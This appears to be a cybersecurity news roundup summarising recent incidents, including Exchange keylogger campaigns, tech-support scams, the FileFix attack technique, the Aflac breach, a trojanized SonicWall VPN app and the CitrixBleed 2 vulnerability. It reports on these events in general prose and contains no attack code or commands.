Hackers target over 70 Microsoft Exchange servers to steal credentials via keyloggers
Unidentified attackers are targeting over 70 publicly exposed Microsoft Exchange servers by injecting JavaScript-based keyloggers into login pages to steal credentials. According to Positive Technologies, the campaign spans 26 countries and exploits known Exchange vulnerabilities like ProxyShell and ProxyLogon, with some attacks dating back to 2021. Exfiltration methods include local file storage, Telegram bots, and DNS tunnels, making detection difficult while capturing credentials and user data in plaintext.
Apple, Netflix, Microsoft sites ‘hacked’ for tech support scams
Tech support scammers are exploiting Google Ads and search parameter injection to display fake support phone numbers on legitimate sites like Apple, Microsoft, and Netflix. Instead of spoofing websites, the attackers link to real support pages with manipulated URLs that show scammer numbers in search results, tricking users into calling them. Once engaged, the scammers aim to steal personal data, payment info, or gain remote access to victims’ devices.
The 2022 initiative by Cloudflare, CrowdStrike and Ping Identity provided cybersecurity support to critical infrastructure sectors seen as potential targets of Russia-linked attacks
Cloudflare, CrowdStrike, and Ping Identity have ended their free Critical Infrastructure Defense Project, originally launched in 2022 to protect sectors like healthcare and utilities from Russia-linked cyber threats. The shutdown comes as DHS warns Iranian hackers may retaliate against U.S. networks following recent U.S. strikes on Iran’s nuclear sites. The NTAS bulletin also cites growing risks of cyber and physical attacks from Iranian-aligned actors and extremist groups.
(NextGov)
wonderNew FileFix attack weaponizes Windows File Explorer for stealthy commands
A researcher has developed FileFix, a new variation of the ClickFix attack that tricks users into pasting malicious PowerShell commands into the Windows File Explorer address bar, enabling stealthy command execution. Unlike prior ClickFix attacks that relied on the Run dialog, FileFix uses a familiar UI and disguises the command behind a fake file path, likely to be adopted by threat actors due to its simplicity and ability to evade detection.
Huge thanks to our sponsor, ThreatLocker
Aflac, one of the USA’s largest insurers, is the latest to fall “under siege” to hackers
Aflac, one of the largest U.S. insurers, is investigating a data breach that may have exposed Social Security numbers, health data, and other sensitive customer information. The attack is suspected to be linked to Scattered Spider, a group known for low-tech social engineering tactics like impersonating employees to bypass security. Despite being labeled “highly sophisticated,” the methods reportedly involved phishing, SIM swapping, and MFA fatigue—not advanced exploits.
Russia releases REvil members after convictions for payment card fraud
A Russian court sentenced four REvil ransomware members for trafficking stolen U.S. payment card data but released them immediately, citing time served in pre-trial detention. The case wasn’t tied to REvil’s major ransomware attacks and is one of the rare instances of Russia prosecuting its own hackers, likely prompted by U.S. pressure in 2021.
Threat actor trojanizes copy of SonicWall NetExtender VPN app
A threat actor distributed a Trojanized version of SonicWall’s NetExtender VPN app, designed to steal user credentials and VPN configuration data. The malicious installer, signed by a suspicious entity, was hosted on attacker-controlled sites to trick users searching for the legitimate app. SonicWall and Microsoft have since mitigated the threat, revoked the fake certificate, and warned users to only download software from official sources.
Don’t panic, but it’s only a matter of time before critical ‘CitrixBleed 2’ is under attack
Citrix has patched a critical vulnerability dubbed “CitrixBleed 2,” affecting NetScaler ADC and Gateway products, which could allow unauthenticated attackers to access sensitive memory data like session tokens. The flaw is similar to the original CitrixBleed, which was heavily exploited by ransomware groups, and experts warn it’s only a matter of time before this new bug is targeted. Citrix urges immediate patching and session-killing commands to mitigate the threat, especially as updated CVE descriptions suggest the risk is more severe than initially disclosed.